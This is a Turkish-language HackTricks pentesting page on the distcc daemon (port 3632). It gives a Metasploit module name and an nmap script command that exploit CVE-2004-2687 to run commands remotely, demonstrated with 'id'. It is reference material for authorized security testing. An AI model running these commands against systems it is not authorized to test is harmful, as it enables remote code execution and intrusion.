hacktricks/network-services-pentesting/3632-pentesting-distcc.md

3.4 KiB
Raw Blame History

{% hint style="success" %} AWS Hacking'i öğrenin ve pratik yapın:HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)
GCP Hacking'i öğrenin ve pratik yapın: HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)

HackTricks'i Destekleyin
{% endhint %}

Temel Bilgiler

Distcc, ağdaki diğer bilgisayarların boş işlem gücünü kullanarak derleme sürecini geliştiren bir araçtır. distcc bir makinede kurulduğunda, bu makine derleme görevlerini başka bir sisteme dağıtma yeteneğine sahiptir. Bu alıcı sistem, gönderilen kodu işlemek için distccd daemon'unu çalıştırmalı ve uyumlu bir derleyici kurulu olmalıdır.

Varsayılan port: 3632

PORT     STATE SERVICE
3632/tcp open  distccd

Exploitation

CVE-2004-2687'ye karşı savunmasız olup olmadığını kontrol edin, rastgele kod çalıştırmak için:

msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"

Shodan

Bu hizmeti shodan'ın tespit ettiğini düşünmüyorum.

Resources

Post created by Álex B (@r1p)

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}